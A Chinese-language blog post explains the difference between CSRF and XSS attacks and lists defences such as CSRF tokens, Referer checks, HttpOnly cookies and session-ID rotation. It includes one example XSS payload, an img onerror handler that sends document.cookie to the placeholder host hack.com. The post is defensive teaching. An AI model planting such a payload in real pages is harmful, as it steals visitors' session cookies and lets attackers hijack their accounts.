CSRF和XSS区别和预防

名词解释

CSRF（Cross-site request forgery）跨站请求伪造

XSS （Cross-site scripting）跨站脚本攻击，这里缩写css被前端层叠样式表（Cascading Style Sheets）占用了，为了区分就叫了xss。

攻击手段描述

• CSRF

攻击场景描述：假设你登陆了a网站，此时你又打开了b网站的某个页面，b网站的某个页面上有一段代码，可能是一个自提交的表单，表单的action是a网站，这样b网站就模拟了你的身份，向a网站发送了一个请求。

CSRF的攻击特点是伪造其他网站的操作，冒用身份比如利用cookie伪造登录凭证，不是窃取cookie，

攻击可达到的后果：可以模拟你在a网站的所有操作，并且操作发生在你使用的浏览器，和你自己操作没有区别，比较著名的有利用gmailCSRF漏洞窃取用户邮件。

• XSS

攻击场景描述：属于注入攻击的一种。两个用户a和b，a在某网站上发表了一篇文章，其中包含了一串js代码，比如说代码如下：

<p>
    这里显示摘要内容，用户可以输入各种文本及图片
    <img style="display:none" src="null" onerror="a=function(ajax({url:'//hack.com/utm.gif',data:{c:document.cookie}}));a();"
</p>

如果网站没有做任何处理，直接存储发表了这个文章，用户b等查看这篇文章的时候，这段代码就可以在用户b没有感知的情况下，窃取到b的cookie并发送到a的服务器，以用于某些不良目的

攻击可达到的后果：窃取用户cookie，损害/控制用户电脑做出某些行为，模拟用户操作等。。xss的攻击如果成功，一般来说是可以造成很严重后果的，因为对方相当于直接控制了你的操作，并做出一些你自己不会做的事情，CSRF相对来说，只是模拟了操作，还是受到服务提供者限制的。

解决方案

• CSRF

对于跨站请求伪造，最重要的就是区分访问源头。因为发生在其他人的网站，防止攻击来源的产生是不可能的，只能从提升自己网站的甄别度来解决。

常用的解决方案：

1. 有每一个表单都带有一个CSRF令牌（CSRF TOKEN）,后端验证没有令牌的直接被拒绝，这里的令牌需要和会话绑定更能确保安全性，尤其是不要提供获取CSRF令牌的接口，否则就形同虚设了。
2. 验证 HTTP Referer 字段
3. 验证码（现在基本大型网站重要的操作都会进行验证，甚至是手机验证码验证来保障安全）

解释一下我博客园评论中雾林的问题：

这个csrf的令牌有啥用呢，现在laravel框架里每个页面都要求请求携带这个令牌，但是我要知道这个令牌，f12你的页面，就可以看到

令牌你可以看到，但是攻击者如果没有你的cookie，按照同源策略，另一个网站的攻击js脚本是获取不到你csrf令牌的，除非你给他看。一般来说你会把存有sessionId的cookie设置为http-only，这样js不可以获取到cookie，只能用由浏览器自动携带，也避免了cookie被盗用。所以从这两点上避免了被攻击。

• XSS

网站不应该信任用户输入的内容，应对用户输入内容进行处理，过滤任何有执行能力的脚本或者影响页面的CSS，保证其他用户访问页面的安全。具体针对每种语言都有相应的处理机制和工具。一般各种后端框架都封装或者提供相关插件处理。

1. 给Cookie添加HttpOnly属性, 使cookie只能在http请求中传递, 像是上面那个脚本中 document.cookie无法获取到该Cookie值. 对XSS的攻击, 有一定的防御值. 但是对网络拦截, 还是泄露了.

2. 在cookie中绑定用户网络信息等环境值,比如ip,user agent等，并在服务端校验. 这样当cookie被人劫持了, 并冒用, 但是在服务器端校验的时候, 发现校验值发生了变化, 一定程度上去规避cookie劫持

3. cookie中session id的定时更换, 可以一定程度减少攻击带来的损害，并不能避免攻击产生。